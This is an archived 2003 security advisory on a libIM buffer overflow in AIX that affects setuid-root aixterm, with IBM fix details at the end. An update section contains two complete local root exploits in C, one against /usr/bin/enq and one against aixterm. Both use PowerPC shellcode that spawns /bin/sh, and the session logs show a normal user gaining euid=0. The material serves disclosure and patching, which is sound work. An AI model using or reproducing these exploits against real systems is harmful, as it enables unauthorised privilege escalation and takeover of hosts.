13th Feb 2003 [SBWID-5987]
COMMAND
libIM.a Buffer Overflow
SYSTEMS AFFECTED
Applications using libIM on AIX 4.3, 5.1 or 5.2 are affected.
PROBLEM
In iDEFENSE Security Advisory [02.12.03] :
http://www.idefense.com/advisory/02.12.03.txt
Credits to Euan Briggs [[email protected]]
I. BACKGROUND
Advanced Interactive eXecutive (AIX) is IBM Corp.'s Unix operating
system implementation, native to pSeries and RS/6000 servers. More
information is available at http://www-1.ibm.com/servers/aix/ .
AIX provides support for National Language Support (NLS). From the AIX
manual available at
http://publib16.boulder.ibm.com/doc_link/en_US/a_doc_lib/aixprggd/nlsgdrf/nat_lang_support.htm
"NLS provides commands and Standard C Library subroutines for a single
worldwide system base. An internationalized system has no built-in
assumptions or dependencies on language-specific or cultural-specific
conventions such as:
Code sets
Character classifications
Character comparison rules
Character collation order
Numeric and monetary formatting
Date and time formatting
Message-text language
All information pertaining to cultural conventions and language is
obtained at process run time."
libIM is a system library used by NLS on AIX.
II. DESCRIPTION
Locally exploiting a buffer overflow within libIM allows an attacker to
obtain the privileges of an application calling the library. The
"/usr/lpp/X11/bin/aixterm" binary calls the libIM library and is then
installed setuid root by default on AIX.
The "-im" command line argument used by aixterm causes the binary to
crash when filled with a string about 50 bytes in length. This allows
an attacker to gain control of the return address of the executing
function, thereby allowing code execution with root privileges.
III. ANALYSIS
Exploitation can provide local attackers with root access to an
affected system.
The following shows how the "-im" command line argument can be filled
and cause the crash of aixterm, giving the user control of the return
address.
We will write the value of 0x11223344 into the appropriate register:
$ ls -la /usr/lpp/X11/bin/aixterm
- -rwsr-xr-x 1 root system 376384 Mar 18 2001
/usr/lpp/X11/bin/aixterm*
$ cp -p /usr/lpp/X11/bin/aixterm test
$ ./test -im `perl -e'print"A"x47;print pack("l",0x11223344)'`
1363-009 aixterm: Cannot open font -dt-interface
user-medium-r-normal-l*-*-*-*-*-*-*-*-*.
Check path name and permissions.
1363-009 aixterm: Cannot open font
- -*-roman-medium-r-normal--8-50-100-100-c-*-ISO8859-1.
Check path name and permissions.
Illegal instruction (core dumped)
$ dbx ./test core
Type 'help' for help.
reading symbolic information ...warning: no source compiled with -g
[using memory image in core]
warning: Unable to access address 0x41414149 from core
Illegal instruction (reserved addressing fault) in . at 0x11223344 ($t1)
warning: Unable to access address 0x11223344 from core 0x11223344 (???)
warning: Unable to access address
0x11223344 from core ffffffff warning: Unable to access address
0x11223344 from core fnmadd.
fr31,fr31,fr31,fr31 (dbx)
--snap--
Update (18 February 2003)
======
/usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX, vulnerabilities
found by Esa Etelavoun, iDEFFENSE, author green [[email protected]]
& dragory [[email protected]], Tested on AIX 4.3.3/RS6000
Reference: lsd-pl.net's exploit
Thanks to wowcode & overhead team at Wowhacker
[http://www.wowhacker.org], I tested BOF in AIX lately. These are
exploits of /usr/bin/enq and /usr/bin/X11/aixterm in AIX. (My system
language is Korean...)
1. /usr/bin/enq
===============
/*
http://online.securityfocus.com/bid/2034
[green@aix test]$ /usr/bin/enq -M `perl -e 'print "a"x2000'`
enq: (경고): 0781-132 메세지 파일
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa을(를) 열 수 없습니다.
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Segmentation fault
[green@aix test]$ su -
root의 암호:
# gdb /usr/bin/enq
GNU gdb 5.0-aix51-020209
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix4.3.3.0"...(no debugging
symbols found)...
(gdb) r -M `perl -e 'print "abcd"x700'`
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x700'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...enq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcenq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cdabcdabcda
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Program received signal SIGSEGV, Segmentation fault.
0x62636460 in ?? () from (unknown load module)
(gdb) r -M `perl -e 'print "abcd"x5000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x5000'`
Program received signal SIGSEGV, Segmentation fault.
0xd018a654 in getenv ()
(gdb) q
[green@aix test]$ id
uid=205(green) gid=1(staff)
[green@aix test]$ ./aix_enq
enq: (WARNING): Can't open message
file //////////////////////////////////////////////////enq: (WARNING):
Can't open message
file /////////////////////////////////////////////////////?
enq: errno = 86: File name too long
# id
uid=205(green) gid=1(staff) euid=0(root) egid=9(printq)
#
exploited by green.
*/
#define ADRNUM 3000
#define NOPNUM 16000
#define ADR_ALLIGN 0
#define ALLIGN 0
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[3000],egg[20000],adr[4],*b,*envp[2];
int i;
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=egg;
envp[1]=0;
b=buffer;
for(i=0;i<ADR_ALLIGN;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=egg;
sprintf(b,"xxx=");b+=4;
for(i=0; i<ALLIGN;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/enq", "enq", "-M", buffer, 0, envp);
}
2. /usr/bin/X11/aixterm
=======================
/*
[dragory@aix dragory]$ cp /usr/bin/X11/aixterm ./test
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im `perl -
e 'print "x"x400'`
Segmentation fault (core dumped)
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x78787878 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im a`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x63646160 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im ab`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x62636460 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im abc`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x61626364 in ?? () from (unknown load module)
(gdb) q
//ADR_ALLIGN = 3
[dragory@aix dragory]$ uname
AIX
[dragory@aix dragory]$ ls -l /usr/bin/X11/aixterm
-rwsr-xr-x 1 root system 376096 7월 20 1999 /usr/bin/X11/aixterm
[dragory@aix dragory]$ id
uid=218(dragory) gid=1(staff)
[dragory@aix dragory]$ gcc -o aixterm_exp aixterm_exp.c
[dragory@aix dragory]$ ./aixterm_exp -d X.X.X.X:0
# id
uid=218(dragory) gid=1(staff) euid=0(root)
#
The vulnerability was discovered by Euan Briggs.
exploited by dragory.
*/
//Original script is written by green
#include <stdio.h>
#include <unistd.h>
#define ADRNUM 1000
#define NOPNUM 16000
#define ADR_ALLIGN 3
#define ALLIGN 0
#define HOST_IP "1.1.1.1:0"
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
//This shellcode is used in AIX 4.3.x
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e) {
char buffer[3000],egg[20000],adr[4],*b,*envp[2], host_ip[] = HOST_IP;
int i, opt, adr_allign = ADR_ALLIGN, allign = ALLIGN;
if(argc < 2)
{
usage(argv[0]);
exit(0);
}
while((opt = getopt(argc, argv, "d:a:A:")) != -1)
{
switch(opt)
{
case 'd':
strcpy(host_ip, optarg);
break;
case 'a':
adr_allign = atoi(optarg);
break;
case 'A':
allign = atoi(optarg);
break;
case '?':
usage(argv[0]);
exit(0);
}
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000; //http://lsd-pl.net
envp[0]=egg;
envp[1]=0;
b=buffer;
for(i=0;i<adr_allign;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=egg;
sprintf(b,"xxx=");b+=4;
for(i=0; i<allign;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/X11/aixterm", "aixterm", "-display", host_ip, "-im", buffer, 0, envp);
}
usage(char *arg) {
printf("Usage : %s -d [Your X Server IP:0] -a [ADR_ALLIGN] -A [ALLIGN] \n", arg);
printf("Default : [Your X Server IP:0]=1.1.1.1:0 ADR_ALLIGN=3 ALLIGN=0 \n");
printf("If not exploited, you may modify ALLIGN, Your X Server IP\n");
}
SOLUTION
VENDOR FIX/RESPONSE
===================
A. E-fix
========
Temporary fixes for AIX 4.3.3, 5.1.0, and 5.2.0 systems are available.
The temporary fixes can be downloaded via ftp from:
ftp://aix.software.ibm.com/aix/efixes/security/libIM_efix.tar.Z
The efix compressed tarball contains three fixes: one each for AIX
4.3.3, AIX 5.1.0 and AIX 5.2.0. It also includes an advisory and a
README file with installation instructions.
B. Official Fix
===============
IBM will provide the following fixes:
APAR number for AIX 4.3.3: IY40307
APAR number for AIX 5.1.0: IY40317
APAR number for AIX 5.2.0: IY40320
NOTE: Fixes will not be provided for versions prior to 4.3 as these are
no longer supported by IBM. Affected customers are urged to upgrade to
4.3.3 or 5.1.0 at the latest maintenance level.
Update (18 February 2003)
======
Shiva Persaud of AIX Security says :
<1>
The aixterm issue is addressed in an efix which can be downloaded from:
ftp://ftp.software.ibm.com/aix/efixes/security/libIM_efix.tar.Z.
<2>
The enq issue was fixed in Feb 2000. The following filesets contain the
most current version of enq:
For AIX 4.3.3:
bos.rte.printers.4.3.3.78
For AIX 5.1.0:
bos.rte.printers.5.1.0.25
For AIX 5.2.0:
bos.rte.printers.5.2.0.0